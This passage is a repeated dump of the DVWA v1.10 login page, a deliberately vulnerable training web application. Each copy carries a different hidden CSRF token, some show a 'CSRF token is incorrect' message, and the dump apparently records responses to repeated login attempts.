id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='cf92da6c5ea2143008be4c577beff8d8' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='1d4166e36cd69a14a505a4c3bdee37a1' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='238717a36651d32c4b0e4c3c90b026c1' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='dc7c55bb1d71ad3142245bac1eb49653' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='cc1c6e2a31e3f58b5ffc5cdfd13ed9ec' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='3ce5d8c7659e2cbc8290f7dcf3abe114' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='d51ed5ab92c75349712b71afd09ca039' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='91f93688c87c79cae83b00bd8ec978c3' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='c969c0de784f107f1c08bcfc4dc461f5' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='6bd744473652c9b0790a31c68b0bc48f' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='ded2f3874e0c40ae9c2a166591777b71' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='dd290fdfd0a4ad93b4f49cedb499c533' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='b041706e910c133a6d2a9ed8f7100b35' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='6587208bbfa8b501b771611b427ca9dd' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='e2b5613f763468e8074e919d12e1f6d2' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input 